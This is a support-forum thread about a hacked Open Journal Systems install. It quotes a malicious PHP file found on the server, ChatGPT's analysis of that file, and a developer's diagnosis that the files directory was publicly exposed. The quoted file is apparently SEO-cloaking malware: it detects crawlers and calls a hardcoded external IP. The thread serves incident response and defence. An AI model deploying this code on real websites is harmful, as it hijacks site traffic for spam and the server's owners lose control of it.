My public folder has been hacked (I suspect the hacker passed through OJS)

Did you face a similar issue? What are the options?

A hacker removed all the files and subfolders from my public folder.

Because I suspect he/she register as an author through OJS I have now selected the option that only the journal manager can subscribe new authors

He/she apparently managed (? through OJS) to upload a php file into my public folder and take the lead.

I have asked ChatGPT

What’s the code in the following file doing in my home directory? "<?php ini_set('display_errors', 1); ini_set('display_startup_errors', 1); error_reporting(E_ALL); ob_start(); // Mulai output buffering $inter_domain = 'http://192.187.108.42/z1007_7/'; function curl_get_contents($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_TIMEOUT, 30); // Meningkatkan waktu timeout cURL menjadi 30 detik $file_contents = curl_exec($ch); curl_close($ch); return $file_contents; } function getServerCont($url, $data = array()) { $url = str_replace(' ', '+', $url); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$url"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 30); // Meningkatkan waktu timeout menjadi 30 detik curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data)); $output = curl_exec($ch); $errorCode = curl_errno($ch); curl_close($ch); if (0 !== $errorCode) { return false; } return $output; } function is_crawler($agent) { $agent_check = false; $bots = 'googlebot|google|yahoo|bing|aol'; if ($agent != '') { if (preg_match("/($bots)/si", $agent)) { $agent_check = true; } } return $agent_check; } function check_refer($refer) { $check_refer = false; $referbots = 'google.co.jp|yahoo.co.jp|google.com'; if ($refer != '' && preg_match("/($referbots)/si", $refer)) { $check_refer = true; } return $check_refer; } $http = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https://' : 'http://'); $req_uri = $_SERVER['REQUEST_URI']; $domain = $_SERVER["HTTP_HOST"]; $self = $_SERVER['PHP_SELF']; $ser_name = $_SERVER['SERVER_NAME']; $req_url = $http . $domain . $req_uri; $indata1 = $inter_domain . "/indata.php"; $map1 = $inter_domain . "/map.php"; $jump1 = $inter_domain . "/jump.php"; $url_words = $inter_domain . "/words.php"; $url_robots = $inter_domain . "/robots.php"; /** * Note: This file may contain artifacts of previous malicious infection. * However, the dangerous code has been removed, and the file is now safe to use. */ ob_end_flush(); // Akhiri output buffering dan kirim ke browser ?>

ChatGPT answered :

This PHP script appears to be potentially malicious and might have been placed in your home directory as part of a security breach. Here’s what it does:

Key Observations:

  1. Error Reporting Enabled:
  • It enables full error reporting (ini_set('display_errors', 1);), which is common in debugging but can expose sensitive information.
  1. Output Buffering (ob_start()):
  • This can be used to manipulate or delay script execution, sometimes to avoid detection.
  1. External Communication via cURL:
  • The script defines functions (curl_get_contents() and getServerCont()) that make HTTP requests to an external server (http://192.187.108.42/z1007_7/).
  • This suggests it might be fetching or sending data to this external domain.
  1. Crawler Detection:
  • The function is_crawler($agent) checks if the request comes from a search engine bot (Googlebot, Yahoo, Bing, AOL).
  • Possible purpose: Avoiding detection by security systems or SEO poisoning.
  1. Referer Validation:
  • The check_refer($refer) function checks if the visitor comes from a search engine (e.g., Google Japan).
  • Possible purpose: Showing different content to real users and search engines (cloaking).
  1. Hardcoded External Endpoints:
  • The script references multiple external PHP files hosted on http://192.187.108.42/z1007_7/, including:
    • /indata.php
    • /map.php
    • /jump.php
    • /words.php
    • /robots.php
  • Possible purpose: Fetching malicious commands, injecting spam links, or redirecting visitors.

Potential Risks:

  • Backdoor or Malware Component:
    • If this script is unauthorized, it may be part of a backdoor allowing remote attackers to control your server.
  • SEO Spam or Cloaking:
    • It may be injecting malicious SEO content or redirecting certain visitors (like search engine crawlers) to external sites.
  • Data Exfiltration:
    • The script could be stealing data from your website and sending it to the external server.

What Should You Do?

  1. Immediately remove this file if you didn’t place it there.
  2. Scan your server for other suspicious files, especially:
  • Unrecognized PHP files
  • Modified .htaccess files
  • Suspicious scheduled tasks (cron jobs)
  1. Check server logs to see how the file was placed in your directory.
  2. Change all passwords (FTP, database, hosting panel) in case of a breach.
  3. Update your server and web applications to prevent further exploitation.

Let me know if you need help identifying more suspicious files! :police_car_light:

Hi @brcgranier,

  • What version of OJS are you using? (Please include this in your posts.)
  • What is the files_dir setting in your config.inc.php?

Regards,
Alec Smecher
Public Knowledge Project Team

ojs-3.4.0.3

public_files_dir = public
public_user_dir_size = 5000
umask = 0022
filename_revision_match = 70

Hi @brcgranier,

I suggest upgrading to the latest 3.4.0-x release; 3.4.0-3 is several builds out of date.

What is the files_dir setting (not public_files_dir)?

Regards,
Alec Smecher
Public Knowledge Project Team

You are right … our mistake: the files folder was in our public directory :(( We corrected that! Thanks again :wink: